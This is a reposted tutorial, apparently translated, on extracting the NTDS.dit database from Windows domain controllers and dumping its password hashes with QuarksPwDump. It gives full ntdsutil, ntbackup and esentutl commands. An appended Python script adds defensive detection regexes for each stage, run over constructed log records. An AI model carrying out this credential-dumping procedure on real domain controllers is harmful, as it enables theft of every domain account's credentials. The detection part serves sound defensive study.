How to export domain controller hashes on Windows 2003, Windows 2008 and Windows 2012
2021-08-15 11:58
Usage as described by the quarkspwdump author:

1. Windows 2008

Microsoft recently implemented VSS (Volume Shadow Copy Service), which allows an administrator to make filesystem snapshots while the operating system is running and writing to the files being backed up. Here is a way to back up the NTDS.dit file while a domain controller is running:

#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
#copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit
#unmount {GUID}
#quit
#quit

If the AD server does not have the "AD DS role", you have to use the dsdbutil.exe command in the same way.

2. Windows 2003

On this version, VSS has been implemented but not NTDS-type snapshots. But you can use the ntbackup tool; here is the procedure:

- Launch the NTBACKUP GUI
- Use the backup wizard (advanced)
- Choose to save system state only and choose an output filename
- Wait some minutes
- Use the restore wizard (advanced)
- Choose your backup, click Next and use the Advanced button
- Choose to restore the files to another location (c:\tmp\ for example)
- Choose to overwrite everything and next uncheck all restoration parameters
- Validate and wait some minutes
- Open a command shell in "c:\tmp\Active Directory"
- We need to repair the database with this command:
  #esentutl /p ntds.dit
- Validate the warning and wait some minutes

The ntds.dit file can now be used with quarkspwdump.
The sequence above (#ntdsutil, #snapshot, #activate instance ntds, #create, #mount {GUID}, #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit, #unmount {GUID}, #quit, #quit) applies when you have an interactive session or are logged on directly. For a semi-interactive session, the following method (a usage seen online) can be used:

ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit
ntdsutil snapshot "unmount {GUID}" quit quit
ntdsutil snapshot "delete {GUID}" quit quit

Finally:

QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

Original article: http://www.cnblogs.com/landuo11/p/7492458.html
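Every step of the procedure above runs as an ordinary process on the domain controller, so it is visible to process-creation auditing. The following Python script is an added example, not code from the post or from QuarksPwDump: it runs detection logic over a few constructed process-creation records (host, user, command line) modelled on the commands above, and correlates the stages per host and user, because a snapshot on its own is routine backup activity while a snapshot followed by a copy, repair or dump of ntds.dit is not. The host names, user names and record format are constructed.

```python
import re
from collections import defaultdict

# Constructed process-creation records (host, user, command line) in the shape of
# the commands this post describes; they are not real logs.
SAMPLE_EVENTS = [
    ("DC01", "CORP\\backupsvc", 'ntdsutil snapshot "activate instance ntds" create quit quit'),
    ("DC01", "CORP\\backupsvc", 'ntdsutil snapshot "mount {GUID}" quit quit'),
    ("DC01", "CORP\\backupsvc", r"copy c:\MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit"),
    ("DC01", "CORP\\backupsvc", r"QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit"),
    ("DC02", "CORP\\admin", 'ntdsutil snapshot "activate instance ntds" create quit quit'),
    ("DC02", "CORP\\admin", 'ntdsutil snapshot "unmount {GUID}" quit quit'),
    ("FS01", "CORP\\user1", r"copy \\fs01\share\report.docx c:\temp\report.docx"),
]

# One regex per stage of the procedure in the post: ntdsutil/dsdbutil snapshot,
# ntbackup system state, copying ntds.dit out, the esentutl /p repair, the dump itself.
STAGES = {
    "snapshot": re.compile(r"\b(ntdsutil|dsdbutil)\b.*\bsnapshot\b", re.I),
    "backup_sysstate": re.compile(r"\bntbackup\b", re.I),
    "copy_dit": re.compile(r"\bcopy\b.*\bntds\.dit\b", re.I),
    "repair_dit": re.compile(r"\besentutl\b.*\s/p\b.*\bntds\.dit\b", re.I),
    "dump": re.compile(r"quarkspwdump|--dump-hash-domain|--ntds-file", re.I),
}

# Stages that mean a copy of the database left the snapshot; these escalate the finding.
EXFIL_STAGES = {"copy_dit", "repair_dit", "dump"}

def classify(command_line):
    """Return the set of stage names a single command line matches."""
    return {name for name, rx in STAGES.items() if rx.search(command_line)}

def correlate(events):
    """Collect matched stages per (host, user). A snapshot alone is normal backup
    activity ("info"); any copy, repair or dump of ntds.dit makes it "high"."""
    seen = defaultdict(set)
    for host, user, cmd in events:
        seen[(host, user)] |= classify(cmd)
    findings = {}
    for key, stages in seen.items():
        if stages:
            severity = "high" if stages & EXFIL_STAGES else "info"
            findings[key] = (severity, sorted(stages))
    return findings

if __name__ == "__main__":
    for (host, user), (severity, stages) in correlate(SAMPLE_EVENTS).items():
        print(f"{severity:<4} {host} {user}: {', '.join(stages)}")
```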
Article link: http://soscw.com/essay/107461.html